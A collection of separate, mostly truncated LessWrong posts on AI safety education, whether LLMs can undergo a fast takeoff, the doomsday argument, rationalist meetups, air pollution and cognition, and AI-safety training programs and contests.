d141544c-1864-4e81-a42b-45f84af2e81f | trentmkelly/LessWrong-43k | LessWrong | AI Safety 101 : Reward Misspecification
Overview
1. Reinforcement Learning: The chapter starts with a reminder of some reinforcement learning concepts. This includes a quick dive into the concept of rewards and reward functions. This section lays the groundwork for explaining why reward design is extremely important.
2. Optimization: This section briefly introduces the concept of Goodhart's Law. It provides some motivation for understanding why rewards are difficult to specify in a way that keeps them from collapsing in the face of immense optimization pressure.
3. Reward misspecification: With a solid grasp of the notion of rewards and optimization the readers are introduced to one of the core challenges of alignment - reward misspecification. This is also known as the Outer Alignment problem. The section begins by discussing the necessity of good reward design in addition to algorithm design. This is followed by concrete examples of reward specification failures such as reward hacking and reward tampering.
4. Learning by Imitation: This section focuses on some proposed solutions to reward misspecification that rely on learning reward functions through imitating human behavior. It examines proposals such as imitation learning (IL), behavioral cloning (BC), and inverse reinforcement learning (IRL). Each section also contains an examination of possible issues and limitations of these approaches as they pertain to resolving reward hacking.
5. Learning by Feedback: The final section investigates proposals aiming to rectify reward misspecification by providing feedback to the machine learning models. The section also provides a comprehensive insight into how current large language models (LLMs) are trained. The discussion covers reward modeling, reinforcement learning from human feedback (RLHF), reinforcement learning from artificial intelligence feedback (RLAIF), and the limitations of these approaches.
1.0: Reinforcement Learning
The section provides a succinct reminder of several concepts in reinf |
3b09e1eb-fee7-4e65-a074-e6d931b79081 | trentmkelly/LessWrong-43k | LessWrong | Weekly LW Meetups
This summary was posted to LW Main on August 26th. The following week's summary is here.
Irregularly scheduled Less Wrong meetups are taking place in:
* Baltimore Area Weekly Meetup: 28 August 2016 08:00PM
* European Community Weekend: 02 September 2016 03:35PM
The remaining meetups take place in cities with regular scheduling, but involve a change in time or location, special meeting content, or simply a helpful reminder about the meetup:
* Moscow: rationalist culture, applied consequentialism, Stanovich: 28 August 2016 02:00PM
* Moscow LW meetup in "Nauchka" library: 09 September 2016 07:50PM
* Sydney Rationality Dojo - September 2016: 04 September 2016 04:00PM
* Sydney Rationality Dojo - October 2016: 02 October 2016 04:00PM
* Washington, D.C.: Legos: 28 August 2016 03:30PM
Locations with regularly scheduled meetups: Austin, Berlin, Boston, Brussels, Buffalo, Canberra, Columbus, Denver, Kraków, London, Madison WI, Melbourne, Moscow, New Hampshire, New York, Philadelphia, Research Triangle NC, San Francisco Bay Area, Seattle, Sydney, Tel Aviv, Toronto, Vienna, Washington DC, and West Los Angeles. There's also a 24/7 online study hall for coworking LWers and a Slack channel for daily discussion and online meetups on Sunday night US time.
If you'd like to talk with other LW-ers face to face, and there is no meetup in your area, consider starting your own meetup; it's easy (more resources here). Check one out, stretch your rationality skills, build community, and have fun!
In addition to the handy sidebar of upcoming meetups, a meetup overview is posted on the front page every Friday. These are an attempt to collect information on all the meetups happening in upcoming weeks. The best way to get your meetup featured is still to use the Add New Meetup feature, but you'll also have the benefit of having your meetup mentioned in a weekly overview. These overview posts are moved to the discussion section when the new post goes up.
Please note that for yo |
9c7e2b71-45b4-4ada-a068-11f94ae45f6c | trentmkelly/LessWrong-43k | LessWrong | Meta-Doomsday Argument: Uncertainty About the Validity of the Probabilistic Prediction of the End of the World
Abstract: Four main forms of Doomsday Argument (DA) exist—Gott’s DA, Carter’s DA, Grace’s DA and Universal DA. All four forms use different probabilistic logic to predict that the end of the human civilization will happen unexpectedly soon based on our early location in human history. There are hundreds of publications about the validity of the Doomsday argument. Most of the attempts to disprove the Doomsday Argument have some weak points. As a result, we are uncertain about the validity of DA proofs and rebuttals. In this article, a meta-DA is introduced, which uses the idea of logical uncertainty over the DA’s validity estimated based on a virtual prediction market of the opinions of different scientists. The result is around 0.4 for the validity of some form of DA, and even smaller for “Strong DA”, which predicts the end of the world in the near term. We discuss many examples of the validity of the DA in real life as an instrument to prove it “experimentally”. We also show that DA becomes strongest if it is based on the idea of the “natural reference class” of observers, that is, the observers who know about the DA (i.e. a Self-Referenced DA). Such a DA predicts that there is a high probability of a global catastrophe with human extinction in the 21st century, which aligns with what we already know based on analysis of different technological risks.
Highlights:
· There are four main types of DA: future population prediction (Gott’s DA), Bayesian update of risks (Carter’s DA), the more probable Late Filter (Grace’s DA) and the Universal DA.
· Meta-DA treats logical uncertainty about the predictive power of the DA as a probability that DA will work.
· We used a virtual prediction market of scientists to assess the logical uncertainty of the DA, which produced an estimate of around 0.4 for its validity.
· The strongest, and thus most important, form of DA is the Self-Referenced DA, and for this class “the end” may come as early as the middle of the 21st century, though |
6bcaa2b6-e112-48a5-9df5-65f301aafd32 | StampyAI/alignment-research-dataset/lesswrong | LessWrong | LLMs May Find It Hard to FOOM
*Epistemic status: some of the technological progress parts of this I've been thinking about for many years, other more LLM-specific parts I have been thinking about for months or days.*
LLMs are trained as [simulators](https://www.lesswrong.com/posts/vJFdjigzmcXMhNTsx/simulators) for token-generating processes, which (in any training set derived from the Internet) are generally human-like or human-derived agents. The computational capacity of these simulated agents is bounded above by the forward-pass computational capacity of the LLM, but is not bounded below. An extremely large LLM could, and frequently will, produce an exquisitely accurate portrayal of a very average human: a sufficiently powerful LLM may be very superhuman at the task of simulating average humans with an IQ of around 100, far better at it than any human writer or improv actor — but whatever average human it simulates won't be superhuman, and that capability is not [FOOM](https://old-wiki.lesswrong.com/w/index.php?title=AI_takeoff&_ga=2.195370917.803104956.1699518808-685953086.1699518806#Hard_takeoff)-making material.
Suppose we had an LLM whose architecture and size was computationally capable in a single forward pass of doing a decent simulation of a human with an IQ of, let's say, O(1000)
(to the extent that an IQ that high is even a meaningful concept: let's make this number better defined by also assuming that this is O(10) times the forward-pass computational capacity needed to do a decent simulation of an IQ 100 human). In its foundation-model form, this LLM is never going to actually simulate someone with IQ ~1000, since its pretraining distribution contains absolutely no text generated by humans with an IQ of ~1000 (or even IQ over 200): this behavior is way, way out-of-distribution. Now, the Net (and presumably the training set derived from it for this LLM) does contain plenty of text generated very slowly and carefully, with many editing passes and much debate, by groups of people in the IQ ~100 to ~145 range, such as Wikipedia and scientific papers, so we would reasonably expect the foundation model of such a very capable LLM to also learn the superhuman ability to generate texts like these in a single pass without any editing. This is useful, valuable, and impressive, and might even help somewhat with the early stages of a FOOM, but it's still not the same thing as actually simulating agents with IQ 1000, and it's not going to get you to a technological singularity: at some point, that sort of capability will top out.
But that's just the foundation model. Next, the model presumably gets tuned and prompted somehow to get it to simulate (hopefully well-aligned) smarter human-like agents, outside the pretraining distribution. A small (Gaussian-tail-decreasing) amount of pretraining text from humans with IQs up to ~160 (around four standard deviations above the mean) is available, and let us assume that very good use is made of it during this extrapolation process. How far would that let the model accurately extrapolate out-of-distribution, past where it has basically any data at all: to IQ 180, probably; 200, maybe; 220, perhaps?
If Hollywood is a good guide, IQ 80-120 humans are abysmal at extrapolating what a character with IQ 160 would do: any time a movie character is introduced as a genius, there is a very predictable set of mistakes that you instantly know they're going to make during the movie (unless them doing so would actively damage the plot). With the debatable exceptions of *Real Genius* and *I.Q.*, movie portrayals of geniuses are extremely unrealistic. Yet most people still enjoy watching them. *The Big Bang Theory* was probably the first mass-media show to accurately portray rather smart people (even if it still had a lot of emphasis on their foibles), and most non-nerds didn't react as though this was particularly new, original, or different.
Hollywood/TV aside, how hard is it to extrapolate the behavior of a higher intelligence? Some things, what one might call zeroth-order effects, are obvious. The smarter system can solve problems the dumber one could usually solve, but faster and more accurately: what one might describe as "more-of-the-same" effects, which are pretty easy to predict. There are also what one might call first-order effects: the smarter system has a larger vocabulary, and has learnt more skills (having made smarter use of available educational facilities and time). It can pretty reliably solve problems that the dumber one can only solve occasionally. These are what one might call "like that but more so" effects, and are still fairly easy to predict. Then there are what one might call second-order effects: certain problems that the dumber system had essentially zero chance of solving, the smarter system can sometimes solve: it has what are often called, in the AI business, "emergent abilities". These are frequently hard to predict, and especially so if you've never seen any systems that smart before. [There is some good evidence that using metrics that effectively have skill thresholds built into them greatly exaggerates the emergentness of new behaviors, and that on more sensible metrics almost all new behaviors emerge slowly with scale. Nevertheless, there are doubtless things that anyone with IQ below 180 just has a 0% probability of achieving, and these are inherently hard to predict if you've never seen any examples of them, and they may be very impactful even if the smarter system's success chance for them is still quite small: genius is only 1% inspiration, as Edison pointed out.] Then there are the third-order consequences of its emergent abilities: those emergent abilities combining and interacting with each other and with all of its existing capabilities in non-obvious ways, which are even harder to predict. Then there are fourth-and-higher-order effects: to display the true capabilities of the smarter system, we need to simulate not just one that spent its life as a lonely genius surrounded by dumber systems, but instead one that grew up in a society of equally-smart peers, discussing ideas with them and building on the work of equally-smart predecessors, educated by equally-smart teachers using correspondingly sophisticated educational methods and materials.
So I'm not claiming that doing a zeroth-order or even first-order extrapolation up to IQ 1000 is very hard. But I think that adding the second-, third-, fourth-, and fifth-plus-order effects to that extrapolation is increasingly hard, and I think those higher-order effects are large, not small, in importance compared to the zeroth- and first-order terms. Someone who can do what an IQ 100 person can do but at 10x the speed, while using 10x the vocabulary and with a vanishingly small chance of making a mistake, is *nothing like* as scary as an actual suitably-educated IQ 1000 hypergenius standing on the shoulders of generations of previous hypergeniuses.
Let's be generous, and say that a doable level of extrapolation from IQ 80-160 gets the model able to reasonably accurately simulate human-like agents all the way up to maybe IQ 240. At this point, I can only see one reasonable approach to get any further: you need to have these IQ 240 agents generate text. Lots and lots of text. As in, at a minimum, of the order of an entire Internet's worth of text. Probably more, since IQ 240 behavior is more complex and almost certainly needs a bigger data set to pin it down.
[I have heard it claimed, for example by Sam Altman during a public interview, that a smarter system wouldn't need anything like as large a dataset to learn from as LLMs currently do. Humans are often given as an existence proof: we observably learn from far fewer text/speech tokens than a less capable LLM does. Of course, the number of non-text token-equivalents from vision, hearing, touch, smell, body position and all our other senses we learn from is less clear, and could easily be a couple of orders of magnitude larger than our text and speech input. However, humans are not LLMs, and we have a *lot* more inbuilt intuitive biases from our genome. We have thousands of different types of neurons, let alone combinations of them into layers, compared to a small handful for a transformer. While much of our recently-evolved overinflated neocortex has a certain '[bitter-lesson](https://www.cs.utexas.edu/~eunsol/courses/data/bitter_lesson.pdf)-like' "just scale it!" look to it, the rest of our brain looks very much like a large array of custom-evolved purpose-specific modules all wired together in a complicated arrangement: a most un-bitter-lesson-like design. The bitter lesson isn't about what gives the most efficient use of processing power, it's about what allows the fastest rate of technological change: less smart engineering and more raw data and processing power. Humans are also, [as Eliezer has pointed out](https://twitter.com/i/web/status/1644776066853240834), learning to be one specific agent of our intelligence level, not how to simulate any arbitrary member of an ensemble of them. As for the LLMs, it's the transformer model that is being pretrained, not the agents it can simulate. LLMs don't use higher-order logic: they use stochastic gradient descent to learn to simulate systems that can do higher-order logic. Their learning process doesn't get to apply the resulting higher-order logic to itself, by any means more sophisticated than SGD descending the gradient curve of its outcome to a closer match to whatever answers are in the pretraining set. So I see no reason to expect that the scaling laws for LLMs are going to suddenly and magically improve dramatically to more human-like dataset sizes as our LLMs "get smarter". Your mileage may of course vary, but I think Sam Altman was either being extremely optimistic, prevaricating, or else expects to stop using LLMs at some point. This does suggest that there could be a capability overhang, telling us that LLMs are not computationally efficient, or at least not data-efficient: they're just efficient in a bitter-lesson sense, as the quickest technological shortcut to building a brain: a lot faster than whole-brain emulation or reverse-engineering the human brain, but quite possibly less efficient, or at the very least less data-efficient.]
If that's the case, then as long as we're using LLMs, the Chinchilla scaling laws will continue to apply, unless and until they taper off into something different (by Sod's law, probably worse). An LLM capable of simulating IQ 240 well is clearly going to need at least 2.4 times as many parameters (I suspect it might be more like 2.4^2, but I can't prove it, so let's be generous and assume I'm wrong here). So by Chinchilla, that means we're going to need 2.4 times as large a training set, generated at IQ ~240, as the IQ ~100 Internet we started off with. So 2.4 times as much content, all generated by things with 2.4 times the inherent computational cost, for a total cost of 2.4^2 times that of creating the Internet. [And that's assuming the simulation doesn't require any new physical observations of the world, just simulated thinking time, which seems *highly* implausible to me: some of those IQ 240 simulations will be of scientists writing papers about the experiments they performed, which will actually need to be physically performed for the outputs to be any use.]
On top of the fact that our first Internet was almost free (all we had to do was spider and filter it, rather than simulate the writing of it), that's a nasty power law. We're going to need to do this again, and again, at more stages on the way to IQ ~1000, and each time we increase the IQ by a factor of k, the cost of doing this goes up by O(k^2) [again, ignoring physical experiment costs]. That's not a formula for FOOM: that looks a lot more like a formula for a subexponential process where each generation takes k times longer than the last one.
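To spell the arithmetic out (my own back-of-envelope restatement of the paragraph above, not a formula from the Chinchilla paper itself):

```latex
% Cost of one capability generation, under the assumptions above:
% required data scales linearly with k, and each token of that data
% costs k times as much to generate as an IQ ~100 token.
\mathrm{tokens}(k) \propto k, \qquad
\mathrm{cost\ per\ token}(k) \propto k, \qquad
\mathrm{total\ cost}(k) \propto k \cdot k = k^{2}.
% For k = 2.4 (IQ ~100 to IQ ~240), that is 2.4^2 = 5.76 "Internets" of cost.
```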
The standard argument for the likelihood of FOOM and the possibility of a singularity is the claim that technological progress is inherently superexponential, inherently a J-shaped curve: that progress shortens the doubling time to more progress. If you look at the history of *Homo sapiens*' technology from the origin of our species to now, it definitely looks like a superexponential J-shaped curve. What's less clear is whether it still looks superexponential if you divide the rate of technological change by the human population at the time, or equivalently use cumulative total human lifespans rather than time as the x-axis. My personal impression is that if you do that, then the total number of human lifespans between different major technological advances looks fairly constant, and it's a boring old exponential curve. If I'm correct, then the main reason for *Homo sapiens*' superexponential curve is that technological improvements also enlarge the human population-carrying capacity of the Earth, so they let us do more invention work in parallel. So I'm not entirely convinced that technological change is in fact inherently superexponential, short of dirty tricks like that, which might-or-might-not be practicable for an ASI trying to FOOM to replicate.
[Technical aside: I suspect, for fairly simple physical reasons, that processing power per atom of computronium at normal temperatures has a practical maximum, so the only way to continually geometrically increase your planetary population is to increase the proportion of the planet (or solar system) that you've turned into computronium (just like humans did for human-brain computronium), which has practical limits, albeit perhaps large ones. Sufficiently exotic not-ordinary-matter forms of computronium might modify this, but repeating this trick each technological generation may be hard, and this definitely isn't a type of FOOM that I'd want to be on the same planet as.]
However, even if I'm wrong and technology inherently is a superexponential process, this sort of k^2 power law is a great way to convert a superexponential back into an exponential or even a subexponential. Whether this happens depends on just how superexponential your superexponential is: so that means the FOOM may, or may not, instead be just a rising curve with no singularity within any finite time.
Now, one argument here would be that LLMs are inefficient, our AIs need to switch to building their agent minds directly, and this is just a capacity overhang. But I think the basic argument still applies, even after this: something k times smarter needs k times the processing power to run. But to reach its full capacity, it also needs suitable cultural knowledge as developed by things as smart as it. That will be bigger, by some power of k, call it alpha, than the cultural knowledge needed by the previous generation. So the total cost of generating that knowledge goes up by a power of k^(1+alpha). I'm pretty sure alpha will be around 1 to 2, so 1+alpha is in the range of around 2 to 3. So changing to a different architecture doesn't get rid of the unhelpful power law. Chinchilla is a general phenomenon: to reach their full potential, smarter things need more training data, and the cost of creating that and training on it goes up as the product of the two.
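As a toy illustration of what this power law does to successive generations (a sketch under assumed values of k and alpha, not a forecast):

```python
# Toy model of the per-generation cost growth argued for above. k is the
# per-generation capability multiplier and alpha the cultural-knowledge
# exponent; both values here are illustrative assumptions.
def generation_costs(k=2.4, alpha=1.5, generations=5):
    cost, costs = 1.0, []
    for _ in range(generations):
        cost *= k ** (1 + alpha)   # each k-fold jump multiplies cost by k^(1+alpha)
        costs.append(cost)
    return costs

print(generation_costs())
# Each generation costs ~8.9x the previous one (2.4^2.5), so under merely
# exponential resource growth the generation times stretch out rather than
# shrink: the subexponential shape described above, not a FOOM.
```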
So, I'm actually somewhat dubious that FOOM or a singularity is possible *at all*, for *any* cognitive architecture. But it definitely looks very challenging with LLM scaling laws.
Suppose that this were correct: what would it mean for ASI timelines? It doesn't change timelines until a little after AGI is achieved. But it would mean that the common concern that AGI might be followed only a few years or months later by a FOOM singularity was mistaken. If so, then we would find ourselves able to cheaply apply many (hopefully well-aligned) agents that were perhaps highly superhuman in certain respects, but that overall were merely noticeably smarter than the smartest human who has ever lived, to any and all problems we wanted solved. The resulting scientific and technological progress and economic growth would clearly be very fast. But the AIs would tell us that, for reasons other than simple processing power, creating an agent much smarter than them is a really hard problem. Or, more specifically, that building it isn't that hard, but properly training/educating it is. They're working on it, but it's going to take even them a while. Plus, the next generation after that will clearly take longer, and the one after that longer still, unless we want to allow them to convert a growing number of mountain ranges into computronium and deserts into solar arrays. Or possibly the moon.
Am I sure enough of all this to say "Don't worry, FOOM is impossible, there definitely will not be a singularity"? No. For example, [Grover's algorithm](https://en.wikipedia.org/wiki/Grover%27s_algorithm) running on quantum hardware might change the power laws involved just enough to make things superexponential again, by shifting k^(1+alpha) to k^(0.5+alpha). However, this argument *has* significantly reduced my P(Doom).
93cd63e6-a15c-479e-8d0e-a4c7e7800c07 | StampyAI/alignment-research-dataset/eaforum | Effective Altruism Forum | Calling for Student Submissions: AI Safety Distillation Contest
At EA UC [Berkeley](https://eaberkeley.com/), we’re launching an ongoing series of contests called the Artificial Intelligence Misalignment Solutions (AIMS) series. This second contest, the [Distillation Contest](https://eaberkeley.com/aims-distillation), is now open to any student enrolled in a university/college: here are our [interest](https://airtable.com/shrUmIqmAoLaNlBQV) and [submission](https://airtable.com/shrffmjDA8Udu4SoC) forms! The contest has prizes as large as $2,500 and closes on May 20th. This blog post restates the information that is on our website, with a bit more explanation of the contest's purpose.
* A huge thank you to Akash for creating the infrastructure and support that allow this project to launch!
* *This competition is for distillations of posts, papers, and research agendas. For short-form arguments for the importance of AI safety, see the* [*AI Safety Arguments Competition*](https://forum.effectivealtruism.org/posts/p3eiBqnijXPv5pCMA/usd20k-in-prizes-ai-safety-arguments-competition)*.*
**Purpose**
===========
AIMS Series
I think that it is currently difficult for university students to find tangible ways to engage with AI Safety. Generally, by creating a series of AI Safety contests, I hope to:
* Help build social capital for students who are interested in Alignment and potentially good at it.
* Create ways for people to test their fit for Alignment work.
* Create a “brand” around my contests over time so that CS students recognize its name and winners recommend the contests to their friends. Hopefully, this name recognition would also increase the ability to create partnerships with CS orgs as well.
For this specific contest, I’m inspired by the arguments that the field of AI Alignment [needs more distillers](https://www.lesswrong.com/posts/zo9zKcz47JxDErFzQ/call-for-distillers) to improve communication [within the field](https://distill.pub/2017/research-debt/), as well as to make their research accessible to a wider audience. The Distillation Contest aims to produce value by:
* Recruiting CS students who have never heard of EA or Alignment before (I will be doing this outreach at UC Berkeley through advertising, but other organizers are welcome to advertise to their own groups for recruitment).
* Increasing the engagement of students who are already interested in Alignment.
* Potentially producing useful distillations of Alignment research and increasing accessibility to said research.
**Contest description:**
========================
The Distillation Contest asks that participants:
* 1) Pick an article/post/research paper on AI Alignment/Safety (ideally from our list below) that would benefit from being more clearly explained.
* 2) Indicate which ideas or sections of their chosen research should be distilled. Applicants can either distill a whole post/article, a specific part of the post/article, or multiple posts/articles.
* 3) Create a distillation: a clearer explanation of the research, along with a new example or new application of the research.
* 4) Optionally: If there is a problem that is trying to be solved by the research you’re distilling, you can attempt to create an additional solution to the problem and include it in your response.
### What makes a good distillation?
A good distillation would explain the **most confusing part** of another piece of writing – the value of a distillation lies in creating new ways to understand confusing concepts or confusing technical writing. These distillations would also help readers infer how the distilled ideas **relate to other Alignment research**. Because of this, creating a good distillation will likely require participants to **read related research** outside of their distilled post in order to make sure they fully understand the ideas presented in the paper.
As an example of a great distillation, Holden Karnofsky, after creating the Most Important Century Series, created a [roadmap](https://www.cold-takes.com/most-important-century-series-roadmap/) to make the series more digestible and navigable. Additionally, Scott Alexander has distilled multiple [complex](https://astralcodexten.substack.com/p/biological-anchors-a-trick-that-might) [dialogues](https://astralcodexten.substack.com/p/yudkowsky-contra-christiano-on-ai?s=r) (and even a [meme](https://astralcodexten.substack.com/p/deceptively-aligned-mesa-optimizers?s=r)) in order to make them more accessible.
Posts/articles that we would encourage applicants to choose for the Distillation Contest to distill include the following list. Applicants are allowed to propose their own posts/articles outside of this list, although it’s possible that the judges will not believe that those articles are convoluted enough to need distillation. Therefore, it’s recommended that applicants distill from the list below. (This list may change over time.)
* Technical research papers from the [Alignment Fundamentals Curriculum](https://docs.google.com/document/d/1mTm_sT2YQx3mRXQD6J2xD2QJG1c3kHyvX8kQc_IQ0ns/edit). Especially the optional readings
* Richard Ngo’s [AGI Safety from First Principles](https://www.alignmentforum.org/s/mzgtmmTKKn5MuCzFJ) sequence
* Evan Hubinger’s [Risks from Learned Optimization](https://www.lesswrong.com/posts/FkgsxrGf3QxhfLWHG/risks-from-learned-optimization-introduction) sequence
* John Wentworth posts (see the first comment [here](https://www.lesswrong.com/posts/zo9zKcz47JxDErFzQ/call-for-distillers)):
+ [The Pointers Problem: Human Values are a Function of Human Latent Variables](https://www.lesswrong.com/posts/gQY6LrTWJNkTv8YJR/the-pointers-problem-human-values-are-a-function-of-humans)
+ [Variables Don’t Represent the Physical World](https://www.lesswrong.com/posts/QaxMwZfMpMYGDeGvX/variables-don-t-represent-the-physical-world-and-that-s-ok)
+ [Selection Theorems](https://www.lesswrong.com/posts/G2Lne2Fi7Qra5Lbuf/selection-theorems-a-program-for-understanding-agents)
+ Debates about how to think about outer alignment and inner alignment ([here](https://www.lesswrong.com/posts/HYERofGZE6j9Tuigi/inner-alignment-failures-which-are-actually-outer-alignment), [here](https://www.lesswrong.com/posts/SzecSPYxqRa5GCaSF/clarifying-inner-alignment-terminology), and [here](https://www.lesswrong.com/posts/a7jnbtoKFyvu5qfkd/formal-inner-alignment-prospectus)).
* [Late 2021 MIRI Conversations](https://www.lesswrong.com/s/n945eovrA3oDueqtq)
* [What Failure Looks Like](https://www.alignmentforum.org/posts/HBxe6wdjxK239zajf/what-failure-looks-like)
* [Eliciting Latent Knowledge](https://docs.google.com/document/d/1WwsnJQstPq91_Yh-Ch2XRL8H_EpsnjrC1dwZXR37PC8/edit#) technical report
### Prizes
$2,500 - One prize available for 1st place submission.
$1,250 - One prize available for 2nd place submission.
$500 - Up to 5 prizes available.
$250 - Up to 10 prizes available.
All prize winners’ names will be posted on the EA Berkeley website and selected distillations will be optionally posted to the website.
### Scoring
Distillations will be scored on the following factors:
* Depth of understanding
* Clarity of presentation
* Rigor of work
* Concision/Length (longer papers will need to present more information than shorter papers)
* Originality of insight
* Accessibility
Preference may be given to distillations that:
* Synthesize multiple sources
* Increase the ease of access for the distillation to be an introduction to a topic
**Final Notes**
===============
There are a few other purposes to this contest that I did not list above but may write about in a future forum post! There are also likely some great articles that should be distilled in addition to the current list of recommended articles (which was chosen by Akash Wasil). If you have any top recommendations for articles you'd like to see distilled, I may add them to our existing list so that applicants have a higher chance of distilling them.
Finally, since the contest is open to all students, please feel free to **share our contest information** with university students you know! Here is a [link](https://docs.google.com/document/d/1EbqgialsbDNJ5J8mxQJnrcCCWf3uPawUlKAHh0-f-aQ/edit?usp=sharing) to our current advertising material for other organizers to distribute if they'd like. |
4c9abb7b-0f35-4209-8128-5ec28ffc46e8 | trentmkelly/LessWrong-43k | LessWrong | TSR #6: Strength and Weakness
**This is part of a series of posts where I call out some ideas from the latest edition of The Strategic Review (written by Sebastian Marshall), and give some prompts and questions that I think people might find useful to answer. I include a summary of the most recent edition, but it's not a replacement for reading the actual article. Sebastian is an excellent writer, and your life will be full of sadness if you don't read his piece. The link is below.
Background Ops #6: Strength and Weakness
SUMMARY
* Soviet Marshal Zhukov had his work cut out for him, and did a pretty stellar job.
* Having a clear understanding of your strengths and weaknesses gives insight into how to design your ops.
* Ways ops (operations) typically fail:
* They aren’t playing to your strengths
* Don’t acknowledge/mitigate weakness
* Not understanding your strengths and weaknesses
* You created a “platonic” ops that “should” work but doesn’t
* “A commander must not be afraid of fighting under unfavourable circumstances.”
* When looking to develop and install operations successfully, things typically don’t change quickly, but they do change. You should periodically re-assess where you’re at, so you don’t fail to capitalize on gains or mitigate emerging weaknesses.
* Things have to actually work, so make sure you’re dealing with the non ideal aspects of your current situation.
It’s really useful to see examples of someone using principles in action. Reading about General Zhukov expertly navigating the strengths and weaknesses of the Soviets and Nazis is a great way to learn. Similarly, I really like Yudkowsky's coming of age story in the sequences. Observing the steps of someone’s mind as they make mistakes or do things well is very informative.
I like the points Sebastian has made about reasons operations often fail, and I think it gives a decent guide on how to kick off a post mortem on plans and ops that you’ve made which haven't worked out.
Most often, my ops fail because I don’t |
f1998882-72bc-4f20-955a-7ba46768c3f6 | trentmkelly/LessWrong-43k | LessWrong | Hypothesis about how social stuff works and arises
EDIT, 2022:
this post is still a reasonable starting point, but I need to post a revised version that emphasizes preventing dominance outside of play. All forms of dominance must be prevented, if society is to heal from our errors. These days I speak of human communication primarily in terms of the network messaging protocols that equate to establishing the state of being in communication, modulated by permissions defined by willingness to demonstrate friendliness via action. I originally wrote this post to counter "status is all you need" type thinking, and in retrospect, I don't think I went anywhere near far enough in eliminating hierarchy and status from my thinking.
With that reasoning error warning in mind, original post continues:
Preface
(I can't be bothered to write a real Serious Post, so I'm just going to write this like a tumblr post. y'all are tryhards with writing and it's boooooring, and also I have a lot of tangentially related stuff to say. Pls critique based on content. If something is unclear, quote it and ask for clarification)
Alright so, this is intended to be an explicit description that, hopefully, could be turned into an actual program, that would generate the same low-level behavior as the way social stuff arises from brains. Any divergence is a mistake, and should be called out and corrected. it is not intended to be a fake framework. it's either actually a description of parts of the causal graph that are above a threshold level of impact, or it's wrong. It's hopefully also a good framework. I'm pretty sure it's wrong in important ways, I'd like to hear what people suggest to improve it.
Recommended knowledge: vague understanding of what's known about how the cortex sheet implements fast inference/how "system 1" works, how human reward works, etc, and/or how ANNs work, how reinforcement learning works, etc.
The hope is that the computational model would generate social stuff we actually see, as high-probability special cases - in se |
bda133c1-272e-46fa-8d97-f7227b6d9c9c | trentmkelly/LessWrong-43k | LessWrong | Air Quality and Cognition
Overview
Air pollution and concerns about its effects continue to rise globally. However, policymakers and environmental regulators have neglected the effects of air pollution on cognitive functioning. A growing body of research points to the risk of exposure to high levels of pollution. It’s unclear how well all of the research will hold up under replication, but an abundance of studies point to clear detrimental effects of air pollution on cognition and decision-making.
Several individuals and organizations are concerned about the lesser-known effects of air pollution. For example, Matt Yglesias wrote an article in 2019 highlighting recent research on air quality's effects on cognitive ability, productivity, decision-making, and dementia and Alzheimer's. Patrick Collison's blog post on the issue appeared to inspire Yglesias's article.
Evidence suggests that air pollution has significant effects on both short-term and long-term cognition. While some studies used natural environmental variations to test the longer-term correlation between air pollution and cognition, other studies created isolated, laboratory experiments to test the short-term effects of air pollution on cognition. Both have yielded statistically significant results pointing to the negative effects of air pollution on cognition.
While air pollution clearly negatively affects cognition, its effects are nuanced and uneven. Cognition is an umbrella term encompassing many different domains of cognition. Generally, the six main domains of cognition are visuospatial/motor function, attention/concentration, learning/memory, executive functioning, social cognition/emotions, and language/verbal skills. Air pollution affects all domains of cognition, but the severity of the effect depends on brain matter, gender, age, and the affected domain of cognition.
In particular, multiple studies find stronger negative correlations between air quality and verbal test scores than math test scores. “Gray matter re |
af1ef55a-a072-4e81-8e77-e3d9b802d457 | trentmkelly/LessWrong-43k | LessWrong | AI Alignment Research Engineer Accelerator (ARENA): call for applicants
(Edited, to now include a section specifically for FAQs about the virtual program.)
TL;DR
Apply here for the third iteration of ARENA (Jan 8th - Feb 2nd)!
Introduction
We are excited to announce the third iteration of ARENA (Alignment Research Engineer Accelerator), a 4-week ML bootcamp with a focus on AI safety. Our mission is to prepare participants for full-time careers as research engineers in AI safety, e.g. at leading organizations or as independent researchers.
The program will run from January 8th - February 2nd 2024[1], and will be held at the offices of the London Initiative for Safe AI. These offices are also being used by several safety orgs (BlueDot, Apollo, Leap Labs), as well as the current London MATS cohort, and several independent researchers. We expect this to bring several benefits, e.g. facilitating productive discussions about AI safety & different agendas, and allowing participants to form a better picture of what working on AI safety can look like in practice.
ARENA offers a unique opportunity for those interested in AI safety to learn valuable technical skills, work in their own projects, and make open-source contributions to AI safety-related libraries. The program is comparable to MLAB or WMLB, but extends over a longer period to facilitate deeper dives into the content, and more open-ended project work with supervision.
For more information, see our website.
Also note that we have a Slack group designed to support independent study of the material (join link here).
Outline of Content
The 4-week program will be structured as follows:
Chapter 0 - Fundamentals
Before getting into more advanced topics, we first cover the basics of deep learning, including basic machine learning terminology, what neural networks are, and how to train them. We will also cover some subjects we expect to be useful going forwards, e.g. using GPT-3 and 4 to streamline your learning, good coding practices, and version control.
Note - partici |